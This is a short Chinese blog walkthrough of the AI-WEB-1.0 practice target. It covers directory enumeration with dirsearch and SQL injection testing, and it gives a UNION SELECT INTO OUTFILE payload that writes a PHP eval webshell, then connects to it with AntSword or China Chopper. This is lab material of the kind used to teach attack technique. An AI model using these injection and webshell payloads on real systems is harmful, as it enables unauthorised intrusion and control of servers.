CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
qq192572302728 分钟前
网络协议传输层
网络·网络协议
芯盾时代29 分钟前
安全大模型智驱网络和数据安全效能跃迁
网络·人工智能·安全·网络安全
dualven_in_csdn1 小时前
搞了两天的win7批处理脚本问题
java·linux·前端
思通数科大数据舆情2 小时前
工业安全零事故的智能守护者:一体化AI智能安防平台
人工智能·安全·目标检测·计算机视觉·目标跟踪·数据挖掘·知识图谱
你的人类朋友2 小时前
✍️【Node.js程序员】的数据库【索引优化】指南
前端·javascript·后端
小超爱编程2 小时前
纯前端做图片压缩
开发语言·前端·javascript
应巅3 小时前
echarts 数据大屏(无UI设计 极简洁版)
前端·ui·echarts
Jimmy3 小时前
CSS 实现描边文字效果
前端·css·html
islandzzzz4 小时前
HMTL+CSS+JS-新手小白循序渐进案例入门
前端·javascript·css·html
Senar4 小时前
网页中如何判断用户是否处于闲置状态
前端·javascript